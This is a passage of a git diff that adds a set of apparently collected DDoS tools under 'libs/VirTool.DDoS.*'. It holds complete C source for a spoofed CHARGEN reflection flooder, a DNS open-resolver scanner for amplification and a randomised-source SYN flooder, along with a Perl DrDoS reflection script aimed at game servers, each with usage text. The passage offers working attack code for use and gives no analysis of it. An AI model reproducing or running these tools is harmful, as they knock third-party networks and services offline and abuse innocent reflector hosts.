+			strleft(remainder, 2);
+			strcpy(returnpart[userid]->value, strsplit(remainder, ":@"));
+			strleft(remainder, 1);
+			if(strchr(remainder, '@'))
+			{
+				strcpy(returnpart[password]->value, strsplit(remainder, "@"));
+				strleft(remainder, 1);
+			}
+			*(returnpart[host]->separator) = 0;
+		}
+		if(i == path && (! *(returnpart[scheme]->value)))
+		{
+			*(returnpart[path]->separator) = 0;
+			strcpy(returnpart[scheme]->value, "http");
+		}
+		regx = (i == path) ? regpath : regall ;
+		seplen = strlen(returnpart[i]->separator);
+		if(strncmp(remainder, returnpart[i]->separator, seplen))
+		continue;
+		else
+		strleft(remainder, seplen);
+		strcpy(returnpart[i]->value, strsplit(remainder, regx));
+	}
+	if(*remainder)
+	sprintf(parseError, "I don't understand '%s'", remainder);
+	free(remainder);
+	return 0;
+}
+char *str_replace(char *orig, char *rep, char *with) {
+	char *result; 
+	char *ins;    
+	char *tmp;    
+	int len_rep;  
+	int len_with; 
+	int len_front; 
+	int count;    
+	if (!orig)
+	return NULL;
+	if (!rep || !(len_rep = strlen(rep)))
+	return NULL;
+	if (!(ins = strstr(orig, rep)))
+	return NULL;
+	if (!with)
+	with = "";
+	len_with = strlen(with);
+	for (count = 0; tmp = strstr(ins, rep); ++count) {
+		ins = tmp + len_rep;
+	}
+	tmp = result = malloc(strlen(orig) + (len_with - len_rep) * count + 1);
+	if (!result)
+	return NULL;
+	while (count--) {
+		ins = strstr(orig, rep);
+		len_front = ins - orig;
+		tmp = strncpy(tmp, orig, len_front) + len_front;
+		tmp = strcpy(tmp, with) + len_with;
+		orig += len_front + len_rep; 
+	}
+	strcpy(tmp, orig);
+	return result;
+}
+char *stristr(const char *String, const char *Pattern)
+{
+	char *pptr, *sptr, *start;
+	uint slen, plen;
+	for (start = (char *)String,
+	pptr = (char *)Pattern,
+	slen = strlen(String),
+	plen = strlen(Pattern);
+	slen >= plen;
+	start++, slen--)
+	{
+		
+		while (toupper(*start) != toupper(*Pattern))
+		{
+			start++;
+			slen--;
+			
+			if (slen < plen)
+			return(NULL);
+		}
+		sptr = start;
+		pptr = (char *)Pattern;
+		while (toupper(*sptr) == toupper(*pptr))
+		{
+			sptr++;
+			pptr++;
+			
+			if ('\0' == *pptr)
+			return (start);
+		}
+	}
+	return(NULL);
+}
+char * strsplit(char * s, char * tok) {
+#define OUTLEN (255)
+	register i, j;
+	static char out[OUTLEN + 1];
+	for(i = 0; s[i] && i < OUTLEN; i++)
+	{
+		if(strchr(tok, s[i]))
+		break;
+		else
+		out[i] = s[i];
+	}
+	out[i] = 0;
+	if(i && s[i])
+	{
+		for(j = 0; s[i]; i++, j++) s[j] = s[i];
+		s[j] = 0;
+	}
+	else if (!s[i])
+	*s = 0;
+	return out;
+}
+char firstpunc(char * s) {
+	while(*s++)
+	if(!isalnum(*s)) return *s;
+	return 0;
+}
+int strleft(char * s, int n) {
+	int l;
+	l = strlen(s);
+	if(l < n)
+	return -1;
+	else if (l == n)
+	*s = 0;
+	memmove(s, s + n, l - n + 1);
+	return n;
+}
+
+unsigned int fnGetIP(char *szHost) {
+	static struct in_addr addr;
+	struct hostent *hHost;
+	addr.s_addr = inet_addr(szHost);
+	if(addr.s_addr == -1)
+	{
+		hHost = gethostbyname(szHost);
+		if(hHost == NULL)
+		{
+			exit(0);
+		}
+		bcopy(hHost->h_addr, (char *)&addr.s_addr, hHost->h_length);
+	}
+	return addr.s_addr;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.CHARGEN.c b/libs/VirTool.DDoS.CHARGEN.c
new file mode 100644
index 00000000..e345136c
--- /dev/null
+++ b/libs/VirTool.DDoS.CHARGEN.c
@@ -0,0 +1,187 @@
+#include <time.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 8192
+#define PHI 0x9e3779b9
+static uint32_t Q[4096], c = 362436;
+struct list
+{
+        struct sockaddr_in data;
+        struct list *next;
+        struct list *prev;
+};
+struct list *head;
+struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
+void init_rand(uint32_t x)
+{
+        int i;
+        Q[0] = x;
+        Q[1] = x + PHI;
+        Q[2] = x + PHI + PHI;
+        for (i = 3; i < 4096; i++)
+        {
+                Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
+        }
+}
+
+uint32_t rand_cmwc(void)
+{
+        uint64_t t, a = 18782LL;
+        static uint32_t i = 4095;
+        uint32_t x, r = 0xfffffffe;
+        i = (i + 1) & 4095;
+        t = a * Q[i] + c;
+        c = (t >> 32);
+        x = t + c;
+        if (x < c) {
+                x++;
+                c++;
+        }
+        return (Q[i] = r - x);
+}
+
+/* function for header checksums */
+unsigned short csum (unsigned short *buf, int nwords)
+{
+        unsigned long sum;
+        for (sum = 0; nwords > 0; nwords--)
+        sum += *buf++;
+        sum = (sum >> 16) + (sum & 0xffff);
+        sum += (sum >> 16);
+        return (unsigned short)(~sum);
+}
+
+void setup_ip_header(struct iphdr *iph)
+{
+        iph->ihl = 5;
+        iph->version = 4;
+        iph->tos = 0;
+        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;
+        iph->id = htonl(54321);
+        iph->frag_off = 0;
+        iph->ttl = MAXTTL;
+        iph->protocol = IPPROTO_UDP;
+        iph->check = 0;
+        iph->saddr = inet_addr("192.168.3.100");
+}
+
+void setup_udp_header(struct udphdr *udph)
+{
+        udph->source = htons(5678);
+        udph->dest = htons(19);
+        udph->check = 0;
+        strcpy((void *)udph + sizeof(struct udphdr), "h");
+        udph->len=htons(sizeof(struct udphdr) + 3);
+}
+
+void *flood(void *par1)
+{
+        struct thread_data *td = (struct thread_data *)par1;
+        char datagram[MAX_PACKET_SIZE];
+        struct iphdr *iph = (struct iphdr *)datagram;
+        struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
+        struct sockaddr_in sin = td->sin;
+        struct  list *list_node = td->list_node;
+        int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+        if(s < 0){
+                fprintf(stderr, "Could not open raw socket.\n");
+                exit(-1);
+        }
+        init_rand(time(NULL));
+        memset(datagram, 0, MAX_PACKET_SIZE);
+        setup_ip_header(iph);
+        setup_udp_header(udph);
+        udph->source = sin.sin_port;
+        iph->saddr = sin.sin_addr.s_addr;
+        iph->daddr = list_node->data.sin_addr.s_addr;
+        iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+        int tmp = 1;
+        const int *val = &tmp;
+        if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+                fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
+                exit(-1);
+        }
+        int i=0;
+        while(1){
+                sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
+                list_node = list_node->next;
+                iph->daddr = list_node->data.sin_addr.s_addr;
+                iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
+                if(i==5)
+                {
+                        usleep(0);
+                        i=0;
+                }
+                i++;
+        }
+}
+int main(int argc, char *argv[ ])
+{
+        if(argc < 4){
+                fprintf(stderr, "Invalid parameters!\n");
+                fprintf(stdout, "Usage: %s <target IP> <target port> <reflection file> <throttle> <time (optional)>\n", argv[0]);
+                exit(-1);
+        }
+        int i = 0;
+        head = NULL;
+        fprintf(stdout, "Setting up Sockets...\n");
+        int max_len = 128;
+        char *buffer = (char *) malloc(max_len);
+        buffer = memset(buffer, 0x00, max_len);
+        int num_threads = atoi(argv[4]);
+        FILE *list_fd = fopen(argv[3],  "r");
+        while (fgets(buffer, max_len, list_fd) != NULL) {
+                if ((buffer[strlen(buffer) - 1] == '\n') ||
+                                (buffer[strlen(buffer) - 1] == '\r')) {
+                        buffer[strlen(buffer) - 1] = 0x00;
+                        if(head == NULL)
+                        {
+                                head = (struct list *)malloc(sizeof(struct list));
+                                bzero(&head->data, sizeof(head->data));
+                                head->data.sin_addr.s_addr=inet_addr(buffer);
+                                head->next = head;
+                                head->prev = head;
+                        } else {
+                                struct list *new_node = (struct list *)malloc(sizeof(struct list));
+                                memset(new_node, 0x00, sizeof(struct list));
+                                new_node->data.sin_addr.s_addr=inet_addr(buffer);
+                                new_node->prev = head;
+                                new_node->next = head->next;
+                                head->next = new_node;
+                        }
+                        i++;
+                } else {
+                        continue;
+                }
+        }
+        struct list *current = head->next;
+        pthread_t thread[num_threads];
+        struct sockaddr_in sin;
+        sin.sin_family = AF_INET;
+        sin.sin_port = htons(atoi(argv[2]));
+        sin.sin_addr.s_addr = inet_addr(argv[1]);
+        struct thread_data td[num_threads];
+        for(i = 0;i<num_threads;i++){
+                td[i].thread_id = i;
+                td[i].sin= sin;
+                td[i].list_node = current;
+                pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
+        }
+        fprintf(stdout, "Starting Flood...\n");
+        if(argc > 5)
+        {
+                sleep(atoi(argv[5]));
+        } else {
+                while(1){
+                        sleep(1);
+                }
+        }
+        return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.DB2AMP.7z b/libs/VirTool.DDoS.DB2AMP.7z
new file mode 100644
index 00000000..2f82ed7f
Binary files /dev/null and b/libs/VirTool.DDoS.DB2AMP.7z differ
diff --git a/libs/VirTool.DDoS.DNS.c b/libs/VirTool.DDoS.DNS.c
new file mode 100644
index 00000000..a8732964
--- /dev/null
+++ b/libs/VirTool.DDoS.DNS.c
@@ -0,0 +1,299 @@
+#include <pthread.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <math.h>
+#include <stropts.h>
+#include <ctype.h>
+#include <errno.h>
+#include <arpa/inet.h>
+#include <netinet/ip.h>
+#include <netinet/udp.h>
+
+struct DNS_HEADER
+{
+	unsigned short id; // identification number
+
+	unsigned char rd :1; // recursion desired
+	unsigned char tc :1; // truncated message
+	unsigned char aa :1; // authoritive answer
+	unsigned char opcode :4; // purpose of message
+	unsigned char qr :1; // query/response flag
+
+	unsigned char rcode :4; // response code
+	unsigned char cd :1; // checking disabled
+	unsigned char ad :1; // authenticated data
+	unsigned char z :1; // its z! reserved
+	unsigned char ra :1; // recursion available
+
+	unsigned short q_count; // number of question entries
+	unsigned short ans_count; // number of answer entries
+	unsigned short auth_count; // number of authority entries
+	unsigned short add_count; // number of resource entries
+};
+
+struct QUESTION
+{
+	unsigned short qtype;
+	unsigned short qclass;
+};
+
+#pragma pack(push, 1)
+struct R_DATA
+{
+	unsigned short type;
+	unsigned short _class;
+	unsigned int ttl;
+	unsigned short data_len;
+};
+#pragma pack(pop)
+
+struct RES_RECORD
+{
+	unsigned char *name;
+	struct R_DATA *resource;
+	unsigned char *rdata;
+};
+
+typedef struct
+{
+	unsigned char *name;
+	struct QUESTION *ques;
+} QUERY;
+
+volatile int running_threads = 0;
+volatile int found_srvs = 0;
+volatile unsigned long per_thread = 0;
+volatile unsigned long start = 0;
+volatile unsigned long scanned = 0;
+volatile int sleep_between = 0;
+volatile int bytes_sent = 0;
+volatile unsigned long hosts_done = 0;
+FILE *fd;
+
+void ChangetoDnsNameFormat(unsigned char* dns,unsigned char* host)
+{
+	int lock = 0 , i;
+	strcat((char*)host,".");
+
+	for(i = 0 ; i < strlen((char*)host) ; i++)
+	{
+		if(host[i]=='.')
+		{
+			*dns++ = i-lock;
+			for(;lock<i;lock++)
+			{
+				*dns++=host[lock];
+			}
+			lock++;
+		}
+	}
+	*dns++='\0';
+}
+
+void *flood(void *par1)
+{
+	running_threads++;
+	int thread_id = (int)par1;
+	unsigned long start_ip = htonl(ntohl(start)+(per_thread*thread_id));
+	unsigned long end = htonl(ntohl(start)+(per_thread*(thread_id+1)));
+	unsigned long w;
+	int y;
+	unsigned char *host = (unsigned char *)malloc(50);
+	strcpy((char *)host, ".");
+	unsigned char buf[65536],*qname;
+	struct DNS_HEADER *dns = NULL;
+	struct QUESTION *qinfo = NULL;
+	dns = (struct DNS_HEADER *)&buf;
+
+	dns->id = (unsigned short) htons(rand());
+	dns->qr = 0;
+	dns->opcode = 0;
+	dns->aa = 0;
+	dns->tc = 0;
+	dns->rd = 1;
+	dns->ra = 0;
+	dns->z = 0;
+	dns->ad = 0;
+	dns->cd = 0;
+	dns->rcode = 0;
+	dns->q_count = htons(1);
+	dns->ans_count = 0;
+	dns->auth_count = 0;
+	dns->add_count = htons(1);
+	qname =(unsigned char*)&buf[sizeof(struct DNS_HEADER)];
+
+	ChangetoDnsNameFormat(qname , host);
+	qinfo =(struct QUESTION*)&buf[sizeof(struct DNS_HEADER) + (strlen((const char*)qname) + 1)];
+
+	qinfo->qtype = htons( 255 );
+	qinfo->qclass = htons(1);
+
+	void *edns = (void *)qinfo + sizeof(struct QUESTION)+1;
+	memset(edns, 0x00, 1);
+	memset(edns+1, 0x29, 1);
+	memset(edns+2, 0xFF, 2);
+	memset(edns+4, 0x00, 7);
+
+	int sizeofpayload = sizeof(struct DNS_HEADER) + (strlen((const char *)qname)+1) + sizeof(struct QUESTION) + 11;
+	int sock;
+	if((sock=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))<0) {
+		perror("cant open socket");
+		exit(-1);
+	}
+	for(w=ntohl(start_ip);w<htonl(end);w++)
+	{
+		struct sockaddr_in servaddr;
+		bzero(&servaddr, sizeof(servaddr));
+		servaddr.sin_family = AF_INET;
+		servaddr.sin_addr.s_addr=htonl(w);
+		servaddr.sin_port=htons(53);
+		sendto(sock,(char *)buf,sizeofpayload,0, (struct sockaddr *)&servaddr,sizeof(servaddr));
+		bytes_sent+=24;
+		scanned++;
+		hosts_done++;
+		usleep(sleep_between*1000);
+	}
+	close(sock);
+	running_threads--;
+	return;
+}
+
+void sighandler(int sig)
+{
+	fclose(fd);
+	printf("\n");
+	exit(0);
+}
+
+void recievethread()
+{
+	printf("Started Listening Thread\n");
+	int saddr_size, data_size, sock_raw;
+	struct sockaddr_in saddr;
+	struct in_addr in;
+
+	unsigned char *buffer = (unsigned char *)malloc(65536);
+	sock_raw = socket(AF_INET , SOCK_RAW , IPPROTO_UDP);
+	if(sock_raw < 0)
+	{
+		printf("Socket Error\n");
+		exit(1);
+	}
+	while(1)
+	{
+		saddr_size = sizeof saddr;
+		data_size = recvfrom(sock_raw , buffer , 65536 , 0 , (struct sockaddr *)&saddr , &saddr_size);
+		if(data_size <0 )
+		{
+			printf("Recvfrom error , failed to get packets\n");
+			exit(1);
+		}
+		struct iphdr *iph = (struct iphdr*)buffer;
+		if(iph->protocol == 17)
+		{
+			unsigned short iphdrlen = iph->ihl*4;
+			struct udphdr *udph = (struct udphdr*)(buffer + iphdrlen);
+			unsigned char* payload = buffer + iphdrlen + 8;
+			if(ntohs(udph->source) == 53)
+			{
+				int body_length = data_size - iphdrlen - 8;
+				struct DNS_HEADER *dns = (struct DNS_HEADER*) payload;
+				if(dns->ra == 1)
+				{
+					found_srvs++;
+					fprintf(fd,"%s . %d\n",inet_ntoa(saddr.sin_addr),body_length);
+					fflush(fd);
+				}
+			}
+		}
+
+	}
+	close(sock_raw);
+
+}
+
+int main(int argc, char *argv[ ])
+{
+
+	if(argc < 6){
+		fprintf(stderr, "Invalid parameters!\n");
+		fprintf(stdout, "Usage: %s <class a start> <class a end> <outfile> <threads> <scan delay in ms>\n", argv[0]);
+		exit(-1);
+	}
+	fd = fopen(argv[3], "a");
+	sleep_between = atoi(argv[5]);
+
+	signal(SIGINT, &sighandler);
+
+	int threads = atoi(argv[4]);
+	pthread_t thread;
+
+	pthread_t listenthread;
+	pthread_create( &listenthread, NULL, &recievethread, NULL);
+
+	char *str_start = malloc(18);
+	memset(str_start, 0, 18);
+	str_start = strcat(str_start,argv[1]);
+	str_start = strcat(str_start,".0.0.0");
+	char *str_end = malloc(18);
+	memset(str_end, 0, 18);
+	str_end = strcat(str_end,argv[2]);
+	str_end = strcat(str_end,".255.255.255");
+	start = inet_addr(str_start);
+	per_thread = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start))) / threads;
+	unsigned long toscan = (ntohl(inet_addr(str_end)) - ntohl(inet_addr(str_start)));
+	int i;
+	for(i = 0;i<threads;i++){
+		pthread_create( &thread, NULL, &flood, (void *) i);
+	}
+	sleep(1);
+	printf("Starting Scan...\n");
+	char *temp = (char *)malloc(17);
+	memset(temp, 0, 17);
+	sprintf(temp, "Found");
+	printf("%-16s", temp);
+	memset(temp, 0, 17);
+	sprintf(temp, "Host/s");
+	printf("%-16s", temp);
+	memset(temp, 0, 17);
+	sprintf(temp, "B/s");
+	printf("%-16s", temp);
+	memset(temp, 0, 17);
+	sprintf(temp, "Running Thrds");
+	printf("%-16s", temp);
+	memset(temp, 0, 17);
+	sprintf(temp, "Done");
+	printf("%s", temp);
+	printf("\n");
+
+	char *new;
+	new = (char *)malloc(16*6);
+	while (running_threads > 0)
+	{
+		printf("\r");
+		memset(new, '\0', 16*6);
+		sprintf(new, "%s|%-15lu", new, found_srvs);
+		sprintf(new, "%s|%-15d", new, scanned);
+		sprintf(new, "%s|%-15d", new, bytes_sent);
+		sprintf(new, "%s|%-15d", new, running_threads);
+		memset(temp, 0, 17);
+		int percent_done=((double)(hosts_done)/(double)(toscan))*100;
+		sprintf(temp, "%d%%", percent_done);
+		sprintf(new, "%s|%s", new, temp);
+		printf("%s", new);
+		fflush(stdout);
+		bytes_sent=0;
+		scanned = 0;
+		sleep(1);
+	}
+	printf("\n");
+	fclose(fd);
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.DOMINATE.c b/libs/VirTool.DDoS.DOMINATE.c
new file mode 100644
index 00000000..9f097158
--- /dev/null
+++ b/libs/VirTool.DDoS.DOMINATE.c
@@ -0,0 +1,197 @@
+/*
+	This is released under the GNU GPL License v3.0, and is allowed to be used for cyber warfare. ;)
+*/
+#include <unistd.h>
+#include <time.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/ioctl.h>
+#include <string.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <pthread.h>
+#include <netinet/tcp.h>
+#include <netinet/ip.h>
+#include <netinet/in.h>
+#include <netinet/if_ether.h>
+#include <netdb.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+#define MAX_PACKET_SIZE 4096
+#define PHI 0x9e3779b9
+static unsigned long int Q[4096], c = 362436;
+static unsigned int floodport;
+volatile int limiter;
+volatile unsigned int pps;
+volatile unsigned int sleeptime = 100;
+void init_rand(unsigned long int x)
+{
+	int i;
+	Q[0] = x;
+	Q[1] = x + PHI;
+	Q[2] = x + PHI + PHI;
+	for (i = 3; i < 4096; i++){ Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i; }
+}
+unsigned long int rand_cmwc(void)
+{
+	unsigned long long int t, a = 18782LL;
+	static unsigned long int i = 4095;
+	unsigned long int x, r = 0xfffffffe;
+	i = (i + 1) & 4095;
+	t = a * Q[i] + c;
+	c = (t >> 32);
+	x = t + c;
+	if (x < c) {
+	x++;
+	c++;
+	}
+	return (Q[i] = r - x);
+}
+unsigned short csum (unsigned short *buf, int count)
+{
+	register unsigned long sum = 0;
+	while( count > 1 ) { sum += *buf++; count -= 2; }
+	if(count > 0) { sum += *(unsigned char *)buf; }
+	while (sum>>16) { sum = (sum & 0xffff) + (sum >> 16); }
+	return (unsigned short)(~sum);
+}
+unsigned short tcpcsum(struct iphdr *iph, struct tcphdr *tcph) {
+
+	struct tcp_pseudo
+	{
+	unsigned long src_addr;
+	unsigned long dst_addr;
+	unsigned char zero;
+	unsigned char proto;
+	unsigned short length;
+	} pseudohead;
+	unsigned short total_len = iph->tot_len;
+	pseudohead.src_addr=iph->saddr;
+	pseudohead.dst_addr=iph->daddr;
+	pseudohead.zero=0;
+	pseudohead.proto=IPPROTO_TCP;
+	pseudohead.length=htons(sizeof(struct tcphdr));
+	int totaltcp_len = sizeof(struct tcp_pseudo) + sizeof(struct tcphdr);
+	unsigned short *tcp = malloc(totaltcp_len);
+	memcpy((unsigned char *)tcp,&pseudohead,sizeof(struct tcp_pseudo));
+	memcpy((unsigned char *)tcp+sizeof(struct tcp_pseudo),(unsigned char *)tcph,sizeof(struct tcphdr));
+	unsigned short output = csum(tcp,totaltcp_len);
+	free(tcp);
+	return output;
+}
+void setup_ip_header(struct iphdr *iph)
+{
+	iph->ihl = 5;
+	iph->version = 4;
+	iph->tos = 0;
+	iph->tot_len = sizeof(struct iphdr) + sizeof(struct tcphdr);
+	iph->id = htonl(54321);
+	iph->frag_off = 0;
+	iph->ttl = MAXTTL;
+	iph->protocol = 6;
+	iph->check = 0;
+	iph->saddr = inet_addr("192.168.3.100");
+}
+void setup_tcp_header(struct tcphdr *tcph)
+{
+	tcph->source = htons(5678);
+	tcph->seq = rand();
+	tcph->ack_seq = 1;
+	tcph->res2 = 3;
+	tcph->doff = 5;
+	tcph->syn = 1;
+	tcph->window = htons(65535);
+	tcph->check = 1;
+	tcph->urg_ptr = 1;
+}
+void *flood(void *par1)
+{
+	char *td = (char *)par1;
+	char datagram[MAX_PACKET_SIZE];
+	struct iphdr *iph = (struct iphdr *)datagram;
+	struct tcphdr *tcph = (void *)iph + sizeof(struct iphdr);
+	struct sockaddr_in sin;
+	sin.sin_family = AF_INET;
+	sin.sin_port = htons (rand() % 2048);
+	sin.sin_addr.s_addr = inet_addr(td);
+	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
+	if(s < 0){
+	fprintf(stderr, "derped.\n");
+	exit(-1);
+	}
+	memset(datagram, 0, MAX_PACKET_SIZE);
+	setup_ip_header(iph);
+	setup_tcp_header(tcph);
+	tcph->dest = htons (rand() % 2048);
+	iph->daddr = sin.sin_addr.s_addr;
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	int tmp = 1;
+	const int *val = &tmp;
+	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
+	fprintf(stderr, "Unable to allocate.\n");
+	exit(-1);
+	}
+	init_rand(time(NULL));
+	register unsigned int i;
+	i = 0;
+	while(1){
+	sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &sin, sizeof(sin));
+	iph->saddr = (rand_cmwc() >> 24 & 0xFF) << 24 | (rand_cmwc() >> 16 & 0xFF) << 16 | (rand_cmwc() >> 8 & 0xFF) << 8 | (rand_cmwc() & 0xFF);
+	iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
+	iph->check = csum ((unsigned short *) datagram, iph->tot_len);
+	tcph->seq = rand_cmwc() & 0xFFFF;
+	tcph->source = htons(rand_cmwc() & 0xFFFF);
+	tcph->check = 0;
+	tcph->check = tcpcsum(iph, tcph);
+	pps++;
+	if(i >= limiter)
+	{
+	i = 0;
+	usleep(sleeptime);
+	}
+	i++;
+	}
+}
+int main(int argc, char *argv[ ])
+{
+	if(argc < 5){
+	fprintf(stderr, "Invalid parameters!\n");
+	fprintf(stdout, "Usage: %s <target IP> <number threads to use> <pps limiter, -1 for no limit> <time>\n", argv[0]);
+	exit(-1);
+	}
+	fprintf(stdout, "Setting up Sockets...\n");
+	int num_threads = atoi(argv[2]);
+	int maxpps = atoi(argv[3]);
+	limiter = 0;
+	pps = 0;
+	pthread_t thread[num_threads];
+	int multiplier = 20;
+	int i;
+	for(i = 0;i<num_threads;i++){
+	pthread_create( &thread[i], NULL, &flood, (void *)argv[1]);
+	}
+	fprintf(stdout, "Starting Flood...\n");
+	for(i = 0;i<(atoi(argv[4])*multiplier);i++)
+	{
+	usleep((1000/multiplier)*1000);
+	if((pps*multiplier) > maxpps)
+	{
+	if(1 > limiter)
+	{
+	sleeptime+=100;
+	} else {
+	limiter--;
+	}
+	} else {
+	limiter++;
+	if(sleeptime > 25)
+	{
+	sleeptime-=25;
+	} else {
+	sleeptime = 0;
+	}
+	}
+	pps = 0;
+	}
+	return 0;
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.DRDOS.pl b/libs/VirTool.DDoS.DRDOS.pl
new file mode 100644
index 00000000..1ab33ad6
--- /dev/null
+++ b/libs/VirTool.DDoS.DRDOS.pl
@@ -0,0 +1,219 @@
+#!/usr/bin/perl -w
+
+use Benchmark;
+use Net::RawIP;
+use Time::HiRes qw ( usleep );
+
+my $rand = int( rand 0x400 );
+my $frag = 0;
+my $doff = 0x05;
+my $ttl  = 0xFF;
+my $tos  = 0x08;
+my $pid;
+my $tx;
+my @list;
+my @running;
+my @pids;
+
+my %attack =
+  ( "tcp" => \&tcp, "quake3" => \&quake3, "source" => \&source, "hl" => \&hl, "gs" => \&gs, "gs2" => \&gs2 );
+
+if ( @ARGV < 7 || @ARGV > 7 ) {
+    &usage();
+    exit;
+}
+
+$tx = $ARGV[3];
+my $t0 = new Benchmark;
+
+print "\n*** Now Reading Hosts Into Array\n\n";
+
+open( ELITE, $ARGV[2] ) || die "Unable to open $ARGV[2]!\n";
+chomp( @list = <ELITE> );
+close(ELITE);
+
+sub tcp {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl },
+            tcp => {
+                dest   => $port,
+                source => $ARGV[1],
+                syn    => 1,
+                ack    => 0,
+                fin    => 0,
+                rst    => 0,
+                psh    => 0,
+                urg    => 0,
+                doff   => $doff
+            }
+        }
+    );
+    $a->send( 0, $tx );
+}
+
+sub quake3 {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
+            udp => {
+                dest   => $port,
+                source => $ARGV[1],
+                data   => chr(255) . chr(255) . chr(255) . chr(255) . "getstatus" . chr(10),
+            }
+        }
+    );
+    $a->send( 0, $tx );
+    
+
+}
+
+sub source {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
+            udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . chr(85), }
+        }
+    );
+    $a->send( 0, $tx );
+    
+
+}
+
+sub hl {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
+            udp => { dest => $port, source => $ARGV[1], data => chr(255) . chr(255) . chr(255) . chr(255) . "rules", }
+        }
+    );
+    $a->send( 0, $tx );
+    
+}
+
+sub gs {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
+            udp => {
+                dest   => $port,
+                source => $ARGV[1],
+                data   => chr(92) . chr(115) . chr(116) . chr(97) . chr(116) . chr(117) . chr(115) . chr(92),
+            }
+        }
+    );
+    $a->send( 0, $tx );
+    
+}
+
+sub gs2 {
+    my ( $ip, $port ) = @_;
+    my $a = new Net::RawIP(
+        {
+            ip  => { saddr => $ARGV[0], daddr => $ip, frag_off => $frag, tos => $tos, ttl => $ttl, },
+            udp => {
+                dest   => $port,
+                source => $ARGV[1],
+                data   => chr(254)
+                  . chr(253)
+                  . chr(0)
+                  . chr(67)
+                  . chr(79)
+                  . chr(82)
+                  . chr(89)
+                  . chr(255)
+                  . chr(255)
+                  . chr(255),
+            }
+        }
+    );
+    $a->send( 0, $tx );
+    
+}
+
+sub paxor {
+    my $type = $_[0];
+    unless ( $type eq "mixed" ) {
+        while (1) {
+			foreach (@list) { $attack{$type}->( split( ':', $_ ) );}
+        }
+    }
+    else {
+        my @part;
+        while (1) {
+            foreach (@list) {
+                @part = split( ":", $_ );
+                $attack{ $part[2] }->( $part[0], $part[1]);
+            }
+        }
+    }
+}
+
+
+for($number = 0;$number < $ARGV[5];$number++)
+{
+$pid = fork();
+if ( $pid == 0 ) {
+    $SIG{INT} = \&controlsub;
+
+    &paxor( $ARGV[4] );
+
+    my $t1 = new Benchmark;
+    my $td = timediff( $t1, $t0 );
+    print "\nTotal Time: ", timestr($td), "\n";
+    sleep(5);
+    exit;
+}
+else {
+        push(@pids, $pid);
+}
+}
+sleep( $ARGV[6] );
+foreach(@pids)
+{
+        kill( "INT", $_ );
+}
+        exit;
+
+sub controlme {
+    $SIG{INT} = \&controlme;
+    print "Signal Caught Now Exiting\n";
+    my $t1 = new Benchmark;
+    my $td = timediff( $t1, $t0 );
+    print "\nTotal Time: ", timestr($td), "\n";
+    sleep(5);
+    exit;
+}
+
+sub controlsub {
+    $SIG{INT} = \&controlsub;
+    exit;
+}
+
+
+sub usage {
+    print << "HEREDOC";
+$0 <target> <target port> <reflector list> <weight> <attack type> <threads> <Time>
+DrDOS Tool V1.8 FINAL by ohnoes1479
+
+Time: Limit running time of the script, Time is in seconds
+threads: number of threads to run
+attack types:
+tcp:     reflected tcp SYN attack
+quake3:  reflected udp attack using quake3 based servers
+source:  reflected udp attack using Valve Source based servers
+hl:      reflected udp attack using Half Life servers
+gs:      reflected udp attack using Gamespy based servers
+gs2:     reflected udp attack using Gamespy 2 based servers
+mixed:   specify type of server in list, EG:
+8.8.8.8:80:tcp
+64.120.46.100:28960:quake3
+Command: $0 127.0.0.1 8080 servers.txt 5 tcp
+HEREDOC
+
+}
\ No newline at end of file
diff --git a/libs/VirTool.DDoS.ESSYN-ACK.c b/libs/VirTool.DDoS.ESSYN-ACK.c
new file mode 100644
